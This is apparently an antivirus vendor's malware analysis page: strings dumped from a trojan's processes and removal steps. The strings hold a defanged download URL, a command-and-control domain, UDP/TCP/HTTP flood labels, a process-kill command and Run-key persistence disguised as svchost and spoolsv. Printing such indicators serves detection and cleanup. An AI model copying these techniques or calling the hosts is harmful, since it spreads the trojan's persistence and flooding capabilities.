?ResponseDefaultKeyEvent@WindowImplBase@DuiLib@@MAEJI@Z
?SetAttribute@CHotKeyUI@DuiLib@@UAEXPBD0@Z
?SetAttribute@CWebBrowserUI@DuiLib@@MAEXPBD0@Z
?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z
?SetAutoURLDetect@CRichEditUI@DuiLib@@QAE_N_N@Z
?SetDisabledImage@CHotKeyUI@DuiLib@@QAEXPBD@Z
?SetEnabled@CHotKeyUI@DuiLib@@UAEX_N@Z
?SetFocusedImage@CHotKeyUI@DuiLib@@QAEXPBD@Z
?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?SetHotImage@CHotKeyUI@DuiLib@@QAEXPBD@Z
?SetHotKey@CHotKeyUI@DuiLib@@QAEXGG@Z
?SetHotKey@CHotKeyWnd@DuiLib@@QAEXGG@Z
?SetInternVisible@CHotKeyUI@DuiLib@@UAEX_N@Z
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?SetLayeredOpacity@CPaintManagerUI@DuiLib@@QAEXE@Z
?SetNativeBkColor@CHotKeyUI@DuiLib@@QAEXK@Z
?SetNormalImage@CHotKeyUI@DuiLib@@QAEXPBD@Z
?SetOpacity@CPaintManagerUI@DuiLib@@QAEXE@Z
?SetPasswordChar@CEditUI@DuiLib@@QAEXD@Z
?SetPasswordMode@CEditUI@DuiLib@@QAEX_N@Z
?SetPos@CHotKeyUI@DuiLib@@QAEXUtagRECT@@@Z
?SetProperty@CWebBrowserUI@DuiLib@@SAJPAUIDispatch@@PA_WPAUtagVARIANT@@@Z
?SetRules@CHotKeyWnd@DuiLib@@QAEXGG@Z
?SetText@CHotKeyUI@DuiLib@@UAEXPBD@Z
?SetVisible@CHotKeyUI@DuiLib@@UAEX_N@Z
?SetWebBrowserEventHandler@CWebBrowserUI@DuiLib@@QAEXPAVCWebBrowserEventHandler@2@@Z
?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z
?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z
?TitleChange@CWebBrowserUI@DuiLib@@IAEXPA_W@Z
?TranslateAcceleratorA@CFlashUI@DuiLib@@EAEJPAUtagMSG@@@Z
?TranslateAcceleratorA@CPaintManagerUI@DuiLib@@QAE_NPAUtagMSG@@@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z
?TranslateMessage@CPaintManagerUI@DuiLib@@SA_NQAUtagMSG@@@Z
?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z
?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ
?_GetBaseMessageMap@CNotifyPump@DuiLib@@KGPBUDUI_MSGMAP@2@XZ
?_GetBaseMessageMap@WindowImplBase@DuiLib@@KGPBUDUI_MSGMAP@2@XZ
?_messageEntries@CNotifyPump@DuiLib@@0QBUDUI_MSGMAP_ENTRY@2@B
?_messageEntries@WindowImplBase@DuiLib@@0QBUDUI_MSGMAP_ENTRY@2@B
?messageMap@CNotifyPump@DuiLib@@1UDUI_MSGMAP@2@B
?messageMap@WindowImplBase@DuiLib@@1UDUI_MSGMAP@2@B
.?AVCMsgWnd@@
.?AVCWebBrowserUI@DuiLib@@
.?AVCHotKeyUI@DuiLib@@
.?AVCHotKeyWnd@DuiLib@@
.?AVCActiveXEnum@DuiLib@@
#*1892 $
%,3:;4-&
zcÁ
Reality.log
D:\Reality.log
bg.png
.xGN'u
=m.kC
.Mt31*
%DS]M
uX'.cf
.AK~'
3T%x^
%c `$
%c^f\.
lL%cr
c.HI0
s.xxz
4%Fpo
.Dn`6
2.AZK
w&d%d
%c'La
,8.xs
|.XfB>'
H{f.Ba
hQk.hO
u]W%X
=F3%s
B2iH%C-
%tkEY
2 %CN
%u"Pd
cJ(%c
(.IYa
[\e@eB%F
V9%D@
9l%XM
.HQn^
s-x}{c
p.PaP-n
%dQ,k
.wEj!
uL%c]
q].Hy
`.cYC
btn_close_down.png
btn_close_highlight.png
btn_close_normal.png
BT_CLOSE.png}V{8
BT_DEFAULT.png
BT_MIN.png
BT_MSG.png
!.xQN
BT_TABLE.png
cb_hot.png
y.Qjh
xGÈ
Mv.vAN
cb_normal.png
.cgla
cb_pushed.png
%f(W]j
C.lkc
6.6.VK
~v..VN
cb_selected.png
%8SJi
checked.png
combo.png
]5`}.WBR(
edit_bk.png
5g%c>
{.Hyp
.vN.VN~!n.!
-f}:<
load_bg.png
login_bg.png
ez.kM
=*a%d
.kTSe
msg_bg.png
%>nh%u s=
notice.png
reg_bg.pngeV
j:qfe.ufF
update_bg.png
d&wr%uQ
BT_CLOSE.png
reg_bg.png
`.rdata
@.data
.rsrc
CNotSupportedException
CHttpFile
CCmdTarget
hhctrl.ocx
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
OLEACC.dll
D:\LoginGame\
\Release\update.pdb
WinExec
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
UnhookWindowsHookEx
CreateDialogIndirectParamW
GetKeyState
SetWindowsHookExW
USER32.dll
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegOpenKeyW
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyW
ADVAPI32.dll
UrlUnescapeW
SHLWAPI.dll
OLEAUT32.dll
InternetCrackUrlW
InternetCanonicalizeUrlW
InternetOpenUrlW
WININET.dll
.PAVCOleException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCHttpFile@@
.?AVCCmdUI@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCFileException@@
.PAVCInternetException@@
.?AVCCmdTarget@@
mV2.AHBC5D;<<(-
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
.YC z=7
GetProcessHeap
ntdll.dll
kernel32.dll
user32.dll
advapi32.dll
hid.dll
mscoree.dll
mscorwks.dll
mscorsvr.dll
KernelBase.dll
mscoreei.dll
clr.dll
diasymreader.dll
&&&&6666????
""""****
2222::::
$$$$\\\\
00006666
####====
6ADVAPI32.DLL
MSVCRT.dll
PSAPI.DLL
RegOpenKeyExA
SHELL32.dll
.KHbZ
%uY_b
.azZU
}.NTF
fSql
q%X$:O
.dVFs
%U56|
Zm%.HP
P#F.HKf
45<.Hj<
5?.Hc
[?.HH
m%.HP
^%xP2
V1&%x
Y81sQl
3s.Qx
v0cMdf
.xZ_m2
SQlC
f.sxm
0%F@{5t{
.fqkj
.GXDm
F!.dR5
eHI}%J.de
_.YI z
]%xUUe!_k
.IhMx<$
QÈ]p.
.ZxD3
yi.tg
`&d.tD!;
nN%xX
mf.AoQ`
IH.Nh
/.Kf 
OÀp
Pq.lR
.sz>@
O%~.Jt
.xrqjsS
/mX%XUz
@kx%f
.LLJ1
G4.Ug
".Itu
-.uxu
ghJ.DC
l.jX;
\Release\LoginGame.pdb
>KERNEL32.dll
%GetProcessHeap
4MapVirtualKeyExA
%SetWindowRgn
ole32.dll
TGetKeyNameTextA
ShellExecuteA
ShellExecuteExA
GetKeyboardLayout
HttpQueryInfoA
0IWININET.dll
WS2_32.dll
IPHLPAPI.DLL
InternetOpenUrlA
IMM32.dll
FCOMCTL32.dll
gdiplus.dll
GdiplusShutdown
Safengine Protector v2.3.8.0
COMCTL32.dll
errorUrl
MSPDB110.DLL
ADVAPI32.DLL
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
hXXp://
@WININET.DLL
@comctl32.dll
@comdlg32.dll
@shell32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
KERNEL32.DLL
hXXp://down.dnffan.com:8082/lg
taskkill.exe /F /IM
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
1.0.0.1
LOGINGAME

%original file name%.exe_2956_rwx_01D06000_00001000:

D:\chengzhen\DNF\StartGame\Release\StartGame.pdb

Reality.log_1796_rwx_004EC000_00001000:

kCv.SCv?lCvg
ux
//./%s
X-X-X-X-X-X
00-00-00-00-00-00
TaskKill.exe
/F /IM DNF.exe
x -
%s x
20161029
skin\LoginGame\
res.xml
LoginGame.zip
LoginGame
edit.edit.account
edit.edit.oldpassword
edit.edit.newpassword
edit.edit.qq
edit.reg.account
edit.reg.password1
edit.reg.password2
edit.reg.qq
checkbox.login.save
edit.login.account
edit.login.password
button.login.enter
button.regaccount
button.cdk
button.editpwd
text.title
text.notice
.\Config.ini
Password
tabctrl.controls
text.load
text.check
text.login
text.build
\DNF.exe
\Script.pvf
%d.%d.%d.%d
update.exe
\update.exe
dnf.exe
DlgMain.xml
button.reg.cancel
button.reg.enter
button.edit.cancel
button.edit.enter
edit.cdk.account
button.cdk.cancel
button.cdk.query
button.cdk.enter
button.mainhome
button.down
button.paycheck

winnet.exe_1248:

.text
`.rdata
@.data
.rsrc
@.reloc
Bv.SCvf-
GetProcessWindowStation
Reality.log
winnet.dll
D:\chengzhen\DNF\StartGame\StartGame\winnet.pdb
KERNEL32.dll
GetCPInfo
C:\Windows\winnet.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
5,5.757;7
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
10.0.14393.206
winnet.exe
1.0.0.1

Reality.log_1796_rwx_00532000_00003000:

.?AVCMsgWnd@@
.?AVCWebBrowserUI@DuiLib@@
.?AVCHotKeyUI@DuiLib@@
.?AVCHotKeyWnd@DuiLib@@
.?AVCActiveXEnum@DuiLib@@
#*1892 $
%,3:;4-&
zcÁ

Reality.log_1796_rwx_00536000_00003000:

20161029
Reality.log
D:\Reality.log

Reality.log_1796_rwx_006F2000_00001000:

KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
SHELL32.dll

Reality.log_1796_rwx_006FB000_00004000:

MSVCRT.dll
PSAPI.DLL
KERNEL32.dll
USER32.dll
SHELL32.dll

Reality.log_1796_rwx_007C6000_00002000:

%SetWindowRgn
GetKeyState
ole32.dll
TGetKeyNameTextA
ADVAPI32.dll
SHELL32.dll
GDI32.dll
ShellExecuteA
ShellExecuteExA
GetKeyboardLayout
HttpQueryInfoA
0IWININET.dll
WS2_32.dll
IPHLPAPI.DLL
InternetOpenUrlA
OLEAUT32.dll
IMM32.dll
FCOMCTL32.dll
gdiplus.dll
GdiplusShutdown
PSAPI.DLL
MSVCRT.dll
Safengine Protector v2.3.8.0

pack11.exe_3608:

`.rsrc
!"#$%&'()*
w.SCv
GetProcessWindowStation
operator
%Program Files%\Internet Explorer\iexplore.exe
GET %s%s%s%s%s%s%s%s%s%s
%d*%dMHz
Windows XP
Windows 2000
Windows 2003
Windows 2008
Windows 2008R2
Windows 7
Windows 2012
Windows 8
Windows 8.1
0.0.0.0
%d Gbps
%d Mbps
UDP_Flood
TCP_Flood
HTTP_Flood
D:\Program Files\svchost\spoolsv.exe
D:\Program Files\svchost\svchost.exe
E:\Program Files\svchost\spoolsv.exe
E:\Program Files\svchost\svchost.exe
%d.%d.%d.%d
%s|%s|%s|%s|%send
D:\chengzhen\
CC\svchost\Release\svchost.pdb
dd.dresou.net
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pack11.exe
.text
`.rdata
@.data
.rsrc
@.reloc
CC\svchost\svchost\spoolsv.pdb
KERNEL32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
GetCPInfo
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
>#>)>.>4>
GetProcessHeap
WinExec
RegOpenKeyExA
ShellExecuteA
URLDownloadToFileA
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
IPHLPAPI.DLL
SHELL32.dll
urlmon.dll
WS2_32.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
Software\Microsoft\Windows\CurrentVersion\Run
D:\Program Files
D:\Program Files\svchost
E:\Program Files
E:\Program Files\svchost

pack11.exe_3608_rwx_00F41000_00022000:

!"#$%&'()*
w.SCv
GetProcessWindowStation
operator
%Program Files%\Internet Explorer\iexplore.exe
GET %s%s%s%s%s%s%s%s%s%s
%d*%dMHz
Windows XP
Windows 2000
Windows 2003
Windows 2008
Windows 2008R2
Windows 7
Windows 2012
Windows 8
Windows 8.1
0.0.0.0
%d Gbps
%d Mbps
UDP_Flood
TCP_Flood
HTTP_Flood
D:\Program Files\svchost\spoolsv.exe
D:\Program Files\svchost\svchost.exe
E:\Program Files\svchost\spoolsv.exe
E:\Program Files\svchost\svchost.exe
%d.%d.%d.%d
%s|%s|%s|%s|%send
D:\chengzhen\
CC\svchost\Release\svchost.pdb
dd.dresou.net
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pack11.exe
.text
`.rdata
@.data
.rsrc
@.reloc
CC\svchost\svchost\spoolsv.pdb
KERNEL32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
GetCPInfo
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
>#>)>.>4>
GetProcessHeap
WinExec
RegOpenKeyExA
ShellExecuteA
URLDownloadToFileA
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
Software\Microsoft\Windows\CurrentVersion\Run
D:\Program Files
D:\Program Files\svchost
E:\Program Files
E:\Program Files\svchost

spoolsv.exe_1928:

.text
`.rdata
@.data
.rsrc
@.reloc
Bv.SCvf-
GetProcessWindowStation
D:\Program Files\svchost\svchost.exe
E:\Program Files\svchost\svchost.exe
D:\chengzhen\
CC\svchost\svchost\spoolsv.pdb
KERNEL32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
GetCPInfo
D:\Program Files\svchost\spoolsv.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
>#>)>.>4>
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
Software\Microsoft\Windows\CurrentVersion\Run


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    winnet.exe:1248
    Intel.exe:1900

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.sys (20 bytes)
    C:\Windows\winnet.dll (124 bytes)
    C:\Windows\winnet.exe (70 bytes)
    C:\Windows\System32\config\SYSTEM.LOG1 (7918 bytes)
    C:\$Directory (2304 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.exe (127 bytes)
    C:\Windows\LSP.dll (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pack11.exe (7427 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\pack11[1].exe (6835 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "INTEL" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now